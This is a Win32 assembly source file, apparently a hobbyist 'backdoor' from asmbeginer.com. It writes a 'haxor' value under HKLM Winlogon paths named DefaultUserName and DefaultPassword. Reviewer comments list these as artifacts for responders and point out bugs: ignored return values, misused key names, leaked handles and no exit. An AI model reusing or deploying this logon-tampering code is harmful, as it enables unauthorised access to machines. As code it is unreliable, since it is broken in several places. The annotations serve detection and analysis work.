;-----------------------------------------------------------------------
; regback.asm - Win32 console program (TASM, flat model, stdcall).
;
; Build (as given by the author):
;   tasm32 -ml regback.asm
;   tasm32 -Tpe -x -c regback.obj ,,, import32
;   NOTE(review): the second command carries linker-style switches and an
;   import library; presumably the linker (tlink32) was meant - confirm.
;
; Written by asmbeginer.com
; www.asmbeginer.com/backdoor/
;
; What the code does, in order:
;   1. Prints a banner and then the text "Account ok !" to the console.
;      Both are printed before any registry call is made, so the message
;      says nothing about whether the writes succeeded.
;   2. Creates/opens two registry keys under the predefined root
;      80000002h (HKEY_LOCAL_MACHINE) and writes a REG_SZ value named
;      'haxor' into each of them.
;   3. Calls RegCloseKey(0) and then runs on into init_console (there is
;      no ret / ExitProcess after the last call).
;
; Host artifacts a responder can look for (taken literally from .data):
;   key   \SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultUserName
;   key   \SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultPassword
;   value 'haxor' (type 1 = REG_SZ), 5 bytes of data: "01010"
; NOTE(review): DefaultUserName / DefaultPassword are used here as *key*
; names (they are the last path component handed to RegCreateKeyExA), so
; the literal paths above are what registry auditing should match on.
; The data is stored in clear text.
;
; No API return value is checked anywhere in the registry sequence.
;-----------------------------------------------------------------------

        .386p
        locals                          ; TASM: enable local symbols
        jumps                           ; TASM: auto-fix out-of-range conditional jumps
        .model flat, stdcall

; Imported Win32 APIs (resolved through import32 at link time).
        extrn GetStdHandle:PROC
        extrn WriteConsoleA:PROC
        extrn ExitProcess:PROC
        extrn RegSetValueExA:PROC
        extrn RegCreateKeyExA : Proc
        extrn RegCloseKey : Proc

        .data

; Banner text. logolen is computed after the trailing 0, so the NUL byte
; is included in the length passed to WriteConsoleA.
logo db "-------------------- R.E.G.B.A.C.K ---------------------------------", 13, 10
 db "Write by: ASMBEGINER.COM, why? just for fun and because i have no job ", 13, 10
 db "----------------------------------------------------------------------", 13, 10, 0
logolen equ $-logo

; Status text. Ends with 13,13 (two carriage returns, no line feed) and
; has no terminating 0; its length comes from accountlen.
account db "Account ok !",13,13
accountlen equ $-account

console_in dd ?                         ; handle returned by GetStdHandle(-10)
console_out dd ?                        ; handle returned by GetStdHandle(-11)
bytes_read dd ?                         ; receives WriteConsoleA's chars-written count

hKey dd 80000002h                       ; predefined root handle: HKEY_LOCAL_MACHINE

; Sub-key paths passed to RegCreateKeyExA. Both start with a backslash.
lpSubKey db '\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultUserName', 0
lpSubKey2 db '\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DefaultPassword', 0

cbData dd 05h                           ; byte count given to RegSetValueExA
lpData db '01010101',0                  ; value data; only the first cbData (5) bytes are passed
lpValueName db 'haxor', 0               ; value name written under the first key (author: "login")
lpValueName2 db 'haxor', 0              ; value name written under the second key (author: "password")
phkResult dd 0                          ; receives the key handle from RegCreateKeyExA
lpdwDisposition dd 0                    ; receives created-vs-opened disposition (never read)

        .code

;-----------------------------------------------------------------------
; start - program entry point.
; Arguments to every API are pushed right-to-left (stdcall); the order of
; the push instructions is therefore part of the behaviour.
;-----------------------------------------------------------------------
start:
        ; Print the banner: write_console(offset logo, logolen).
        call init_console
        push logolen
        push offset logo
        call write_console

        ; Print "Account ok !". init_console is called a second time and
        ; simply re-fetches the same two standard handles.
        call init_console
        push accountlen
        push offset account
        call write_console

        ; --- first key (author's label: "write login") ---
        ; RegCreateKeyExA(hKey, lpSubKey, 0, NULL, 0, samDesired, NULL,
        ;                 &phkResult, &lpdwDisposition)
        push offset lpdwDisposition     ; lpdwDisposition
        push offset phkResult           ; phkResult (out: key handle)
        push 0                          ; lpSecurityAttributes = NULL
        push 1F0000h + 1 + 2h           ; samDesired = 1F0003h: STANDARD_RIGHTS_ALL | KEY_QUERY_VALUE | KEY_SET_VALUE
        push 0                          ; dwOptions = 0
        push 0                          ; lpClass = NULL
        push 0                          ; Reserved
        push offset lpSubKey            ; lpSubKey
        push hKey                       ; hKey = contents of hKey (80000002h)
        call RegCreateKeyExA            ; NOTE(review): result in eax is ignored

        ; RegSetValueExA(phkResult, "haxor", 0, REG_SZ, lpData, cbData)
        push cbData                     ; cbData = 5 (contents of cbData)
        push offset lpData              ; lpData
        push 01h                        ; dwType = 1 (REG_SZ)
        push 0                          ; Reserved
        push offset lpValueName         ; lpValueName
        push phkResult                  ; hKey = handle stored by the call above (0 if that call failed)
        call RegSetValueExA             ; NOTE(review): result in eax is ignored

        ; --- second key (author's label: "write password") ---
        ; Same call sequence with lpSubKey2 / lpValueName2. phkResult is
        ; overwritten here, so the first key handle is never closed.
        push offset lpdwDisposition     ; lpdwDisposition
        push offset phkResult           ; phkResult (out: key handle)
        push 0                          ; lpSecurityAttributes = NULL
        push 1F0000h + 1 + 2h           ; samDesired = 1F0003h (as above)
        push 0                          ; dwOptions = 0
        push 0                          ; lpClass = NULL
        push 0                          ; Reserved
        push offset lpSubKey2           ; lpSubKey
        push hKey                       ; hKey = 80000002h
        call RegCreateKeyExA

        push cbData                     ; cbData = 5
        push offset lpData              ; lpData (same data as for the first key)
        push 01h                        ; dwType = 1 (REG_SZ)
        push 0                          ; Reserved
        push offset lpValueName2        ; lpValueName
        push phkResult                  ; hKey = handle from the second create call
        call RegSetValueExA

        ; NOTE(review): RegCloseKey is given the constant 0, not phkResult,
        ; so neither opened handle is closed by this call.
        push 0
        call RegCloseKey
        ; NOTE(review): this endp has no matching "proc" in the file, and no
        ; ret / ExitProcess precedes it; control continues into init_console.
        endp

;-----------------------------------------------------------------------
; init_console - fetch the standard input and output handles.
; In:    nothing
; Out:   [console_in], [console_out] set; eax = last handle fetched
; Exits the process with code 0 if either GetStdHandle call returns 0.
; NOTE(review): only a zero return is tested; GetStdHandle signals failure
; with INVALID_HANDLE_VALUE (-1), which this test does not catch.
;-----------------------------------------------------------------------
init_console proc
        push -10                        ; STD_INPUT_HANDLE
        call GetStdHandle
        or eax, eax                     ; sets ZF when eax == 0
        je init_error
        mov [console_in], eax
        push -11                        ; STD_OUTPUT_HANDLE
        call GetStdHandle
        or eax, eax
        je init_error
        mov [console_out], eax
        ret
init_error:
        push 0                          ; exit code 0
        call ExitProcess
        endp

;-----------------------------------------------------------------------
; write_console(text_out, text_len) - write text_len characters starting
; at text_out to the handle stored in console_out.
; In:    text_out = address of the text, text_len = character count
; Out:   bytes_read receives the count written by WriteConsoleA
; The general registers are saved and restored around the call, so the
; API's return value in eax is discarded.
; NOTE(review): frame setup and argument cleanup are left to the assembler
; via the "proc ... :dword" argument list under the stdcall model - confirm
; against the listing.
;-----------------------------------------------------------------------
write_console proc text_out:dword, text_len:dword
        pusha
        ; WriteConsoleA(console_out, text_out, text_len, &bytes_read, NULL)
        push 0                          ; lpReserved = NULL
        push offset bytes_read          ; lpNumberOfCharsWritten
        push text_len                   ; nNumberOfCharsToWrite
        push text_out                   ; lpBuffer
        push console_out                ; hConsoleOutput = contents of console_out
        call WriteConsoleA
        popa
        ret
        endp

        end start